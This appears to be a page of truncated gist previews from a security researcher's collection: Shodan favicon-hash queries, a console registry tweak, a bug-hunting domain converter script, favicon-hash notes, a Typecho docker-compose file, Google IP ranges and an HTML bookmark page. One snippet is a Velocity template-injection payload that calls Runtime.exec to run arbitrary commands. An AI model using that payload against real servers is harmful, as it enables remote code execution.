http.favicon.hash:-386189083
http.favicon.hash:-385909173
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Console\%SystemRoot%_system32_cmd.exe] | |
| "CodePage"=dword:0000fde9 | |
| "FontFamily"=dword:00000036 | |
| "FontWeight"=dword:00000190 | |
| "FaceName"="Consolas" | |
| "ScreenBufferSize"=dword:232900d2 | |
| "WindowSize"=dword:002b00d2 |
| #set($exp="exp") | |
| #set($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command)) | |
| #set($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) | |
| #set($sc = $exp.getClass().forName("java.util.Scanner")) | |
| #set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream"))) | |
| #set($scan=$constructor.newInstance($input).useDelimiter("\\A")) | |
| #if($scan.hasNext()) | |
| $scan.next() | |
| #end |
| #!/bin/bash | |
| # Converter.sh by @xdavidhu | |
| # This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix | |
| # With this script, you can convert domain lists to resolved IP lists without duplicates. | |
| # Usage: ./converter.sh [domain-list-file] [output-file] | |
| echo -e "[+] Converter.sh by @xdavidhu\n" | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]" | |
| exit 1 |
| # # https://twitter.com/brsn76945860/status/1171233054951501824 | |
| # pip install mmh3 | |
| # ----------------------------- | |
| # # python 2 | |
| # import mmh3 | |
| # import requests | |
| # response = requests.get('https://cybersecurity.wtf/favicon.ico') | |
| # favicon = response.content.encode('base64') |
| #encoding: utf-8 | |
| import os | |
| import re | |
| import subprocess | |
| import xml.etree.ElementTree as ET | |
| import sys | |
| # copy from https://tttang.com/archive/1497/ | |
| # author: https://tttang.com/user/DVK |
| version: '3.7' | |
| services: | |
| typecho: | |
| image: joyqi/typecho:nightly-php7.4-apache | |
| container_name: typecho-server | |
| restart: always | |
| environment: | |
| - TYPECHO_SITE_URL=https://example.com | |
| - TYPECHO_INSTALL=1 |
| 8.8.4.0/24 | |
| 8.8.8.0/24 | |
| 8.34.208.0/20 | |
| 8.35.192.0/20 | |
| 23.236.48.0/20 | |
| 23.251.128.0/19 | |
| 34.0.0.0/15 | |
| 34.2.0.0/16 | |
| 34.3.0.0/23 | |
| 34.3.3.0/24 |
| <!doctype html> | |
| <html lang="zh-CN"> | |
| <head> | |
| <meta charset="utf-8"> | |
| <meta name="viewport" content="width=device-width,initial-scale=1"> | |
| <title>我的书签</title> | |
| <style> | |
| body { | |
| margin:0; | |
| font-family:sans-serif; |